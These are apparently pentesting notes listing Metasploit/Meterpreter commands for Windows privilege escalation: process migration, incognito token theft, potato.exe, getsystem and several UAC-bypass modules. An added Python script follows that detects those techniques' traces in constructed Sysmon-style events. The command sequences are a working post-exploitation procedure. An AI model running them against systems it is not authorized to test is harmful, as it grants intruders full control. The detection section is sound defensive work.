[Notes] Privilege escalation on an established Windows session with MSF

Preface

Privilege escalation on an established Windows session with MSF

Privilege escalation via process injection

  • List all processes and find one that can be used for privilege escalation

    meterpreter > ps

  • Migrate into that process

    <pid>: the pid of the process to inject into, taken from the previous step

    meterpreter > migrate <pid>

Privilege escalation via token stealing

  • Load the module

    meterpreter > use incognito

  • List the tokens that can be stolen

    meterpreter > list_tokens -u

  • Steal the token

    meterpreter > impersonate_token "AUTHORITY\SYSTEM"

If the token cannot be stolen

  • potato.exe can be combined with incognito to escalate

    meterpreter > execute -cH -f .\potato.exe
    meterpreter > use incognito
    meterpreter > impersonate_token "AUTHORITY\SYSTEM"

Automatic privilege escalation

    meterpreter > getsystem

Bypassing UAC

bypassuac

  • For Windows 7 and earlier

    msf exploit(multi/handler) > use exploit/windows/local/bypassuac
    msf exploit(windows/local/bypassuac) > set session <id>
    msf exploit(windows/local/bypassuac) > run
    meterpreter > getsystem

bypassuac_sluihijack

  • For Windows 10

    msf exploit(multi/handler) > use exploit/windows/local/bypassuac_sluihijack
    msf exploit(windows/local/bypassuac_sluihijack) > set session <id>
    msf exploit(windows/local/bypassuac_sluihijack) > run
    meterpreter > getsystem

bypassuac_silentcleanup

    msf exploit(multi/handler) > use exploit/windows/local/bypassuac_silentcleanup
    msf exploit(windows/local/bypassuac_silentcleanup) > set session <id>
    msf exploit(windows/local/bypassuac_silentcleanup) > run
    meterpreter > getsystem

ask

  • Works on all versions

    msf exploit(multi/handler) > use exploit/windows/local/ask
    msf exploit(windows/local/ask) > set session <id>
    msf exploit(windows/local/ask) > run

  • A User Account Control prompt appears at this point; the user has to click it before escalation succeeds

    meterpreter > getsystem

Done
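From the defender's side, the steps above leave traces in endpoint telemetry. The following is an added example, not part of the original notes: a small triage script over constructed Sysmon-style events that flags a thread created from a user-writable path into a system process (how `migrate` appears from outside) and registry writes to the values the two UAC-bypass modules are assumed to rewrite (HKCU\Environment\windir for silentcleanup, exefile\shell\open\command for sluihijack). The event field names, the sample events and the `find_alerts` function are all assumptions made for this example.

```python
"""Added example (not from the original notes): flag the footprints that process
migration and the registry-based UAC bypasses are assumed to leave in Sysmon-style
events. All field names and sample events are constructed for this illustration."""
import json
import re

# Registry values assumed to be rewritten by bypassuac_silentcleanup
# (HKCU\Environment\windir) and bypassuac_sluihijack (exefile\shell\open\command).
SUSPICIOUS_REG_VALUES = [
    re.compile(r"^HKU\\[^\\]+\\Environment\\windir$", re.I),
    re.compile(r"^HKU\\[^\\]+\\Software\\Classes\\exefile\\shell\\open\\command", re.I),
]
USER_WRITABLE = re.compile(r"^C:\\Users\\", re.I)   # assumed attacker-controlled path
SYSTEM_DIR = re.compile(r"^C:\\Windows\\", re.I)    # assumed high-value target path

# Constructed sample events (Sysmon-like field names; not real telemetry).
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe"},
    {"EventID": 8, "SourceImage": r"C:\Users\bob\AppData\Local\Temp\x.exe",
     "TargetImage": r"C:\Windows\System32\svchost.exe"},
    {"EventID": 8, "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\explorer.exe"},
    {"EventID": 13, "TargetObject": r"HKU\S-1-5-21-1\Environment\windir",
     "Details": r"C:\Users\bob\AppData\Local\Temp\a.exe &"},
    {"EventID": 13, "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Foo",
     "Details": "1"},
]


def find_alerts(events):
    """Return (rule_name, event) pairs for events that deserve analyst triage."""
    alerts = []
    for ev in events:
        if ev.get("EventID") == 8:  # CreateRemoteThread
            src, dst = ev.get("SourceImage", ""), ev.get("TargetImage", "")
            # A binary running from a user-writable path injecting a thread into a
            # system binary is the external view of `migrate <pid>`.
            if USER_WRITABLE.search(src) and SYSTEM_DIR.search(dst):
                alerts.append(("remote_thread_into_system_process", ev))
        elif ev.get("EventID") == 13:  # RegistryEvent (value set)
            target = ev.get("TargetObject", "")
            if any(p.search(target) for p in SUSPICIOUS_REG_VALUES):
                alerts.append(("uac_bypass_registry_write", ev))
    return alerts


if __name__ == "__main__":
    for rule, ev in find_alerts(SAMPLE_EVENTS):
        print(rule, json.dumps(ev))
```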